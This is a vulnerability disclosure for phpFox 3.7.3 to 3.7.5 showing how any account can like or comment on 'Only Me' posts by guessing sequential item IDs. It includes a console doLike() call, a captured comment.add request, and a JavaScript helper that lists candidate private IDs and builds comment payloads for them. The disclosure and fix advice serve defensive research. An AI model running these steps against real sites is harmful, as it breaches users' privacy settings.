phpFox vulnerability, v3.7.3, v3.7.4 and v3.7.5 (all builds)

This document is part of the disclosure of a vulnerability I found in phpFox late last year. The process took longer than I expected (about five months), which I believe was due to the number of modules involved; in any case everything went well and the issue is now public.

The problem description can be found on the following websites:

[+] Links

[+] CVEs

[+] Marking a publication set to "Only Me" as "liked" (v3.7.3 and v3.7.4)

Analyzing how a "comment" and a "like" are attached to a publication, it was possible to manipulate the requests so that a publication set to "ONLY ME" receives a comment or a "like" from an external account that has no relationship with the owner: the server acts on the client-supplied item ID without checking whether the requesting user is allowed to see that item. Private "Only Me" publications are easy to discover from the page source, because every publication carries a sequential numeric identifier; the IDs that are missing from the sequence rendered for the viewer are the holes to look at.

$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);

Unique ID   Possible privacy
26 -------> public
27 -------> removed or private
28 -------> public
29 -------> removed or private
30 -------> public
31 -------> removed or private
32 -------> removed or private
33 -------> public

The same logic applies to other publication types, such as videos, links and so on.

To illustrate, assume the post with ID 27 is private ("ONLY ME"). To mark it as "liked", run the line below in the browser's JavaScript console while logged in as any account:

$Core.Like.Actions.doLike(0, 'user_status', 27, 0, this);

The owner's account is notified, and the user who ran the code above appears in the "like" list of that private publication.

This problem affects v3.7.3 and v3.7.4 (all builds).

[+] Commenting on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)

Following the logic above, we can identify likely private publications. We take ID 27 again, remembering that it is private ("Only Me"), and add a comment to it.

These are the variables of a comment request (a captured sample; the security token and profile_user_id are specific to the session that produced it):

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

Variables that can be manipulated:

val[text]    -------> text of the comment
val[type]    -------> user_status, photo, music_song, poll, link, blog
val[item_id] -------> unique ID of the target publication
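The two steps described above, discovering the IDs missing from the rendered doLike() calls and building the comment.add body for each of them, as an added example in Node-runnable JavaScript. This is not code from the original advisory or from phpFox, and it does not send anything: the HTML is a constructed sample modelled on the doLike() lines quoted earlier, and securityToken and profileUserId are assumed inputs that would have to be copied from a legitimate request in the attacker's own session.

```javascript
// Added example (not from the original advisory or phpFox): enumerate candidate
// "Only Me" item IDs from the gaps in a page's doLike() calls, then build the
// comment.add request bodies with the fields the advisory lists. Nothing is sent.

// Constructed sample of the markup a profile page renders for its visible posts.
// IDs 27, 29, 31 and 32 are deliberately absent.
const SAMPLE_PAGE_HTML = `
<a onclick="$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);">Like</a>
<a onclick="$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);">Like</a>
<a onclick="$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);">Like</a>
<a onclick="$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);">Like</a>
`;

// Item types the advisory lists as valid values for val[type].
const ITEM_TYPES = ['user_status', 'photo', 'music_song', 'poll', 'link', 'blog'];

// Pull every (type, item_id) pair out of the doLike(...) calls in page source.
function extractLikeTargets(html) {
  const re = /doLike\(\s*\d+\s*,\s*['"‘’]([a-z_]+)['"‘’]\s*,\s*(\d+)\s*,/g;
  const targets = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    targets.push({ type: m[1], itemId: Number(m[2]) });
  }
  return targets;
}

// IDs missing from the observed sequence for one type. Each gap is either a
// deleted item or one the viewer is not allowed to see ("Only Me").
function findCandidatePrivateIds(html, type = 'user_status') {
  const ids = extractLikeTargets(html)
    .filter((t) => t.type === type)
    .map((t) => t.itemId)
    .sort((a, b) => a - b);
  if (ids.length === 0) return [];
  const seen = new Set(ids);
  const gaps = [];
  for (let id = ids[0]; id <= ids[ids.length - 1]; id++) {
    if (!seen.has(id)) gaps.push(id);
  }
  return gaps;
}

// Build the application/x-www-form-urlencoded body for core[call]=comment.add.
// securityToken and profileUserId are assumed per-session inputs (copied from a
// request the browser made itself); only type, item_id and text are attacker-chosen.
function buildCommentPayload({ type, itemId, text, securityToken, profileUserId }) {
  if (!ITEM_TYPES.includes(type)) throw new Error(`unsupported val[type]: ${type}`);
  if (!Number.isInteger(itemId) || itemId <= 0) throw new Error('item_id must be a positive integer');
  const body = new URLSearchParams();
  body.set('core[ajax]', 'true');
  body.set('core[call]', 'comment.add');
  body.set('core[security_token]', securityToken);
  body.set('val[type]', type);
  body.set('val[item_id]', String(itemId));
  body.set('val[parent_id]', '0');
  body.set('val[is_via_feed]', '0');
  body.set('val[default_feed_value]', 'Write a comment...');
  body.set('val[text]', text);
  body.set('core[is_admincp]', '0');
  body.set('core[is_user_profile]', '1');
  body.set('core[profile_user_id]', String(profileUserId));
  return body.toString();
}

// One body per candidate ID, ready to be POSTed to the site's ajax endpoint.
function payloadsForGaps(html, opts) {
  return findCandidatePrivateIds(html, opts.type).map((itemId) => ({
    itemId,
    body: buildCommentPayload({ ...opts, itemId }),
  }));
}

// Stand-alone run against the constructed sample (assumed token and profile id).
console.log(JSON.stringify(payloadsForGaps(SAMPLE_PAGE_HTML, {
  type: 'user_status',
  text: 'AQUI!!!!!!!!!!!',
  securityToken: '686f82ec43f7dcd92784ab36ab5cbfb7',
  profileUserId: 290,
}), null, 2));
```

The gap list is only a list of candidates: a missing ID may equally be a deleted item, and the only way to tell the two apart is the server's response. Any fix belongs on the server, not in the client: the like and comment.add handlers have to check the target item's privacy against the requesting user before acting, because val[item_id] and the rest of the body are entirely under the client's control.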

To make the process more dynamic, the script below was created.

[+] See the script on GitHub for more details.

The same request can also be manipulated directly in the browser console.

This problem affects v3.7.3, v3.7.4 and v3.7.5 (all builds).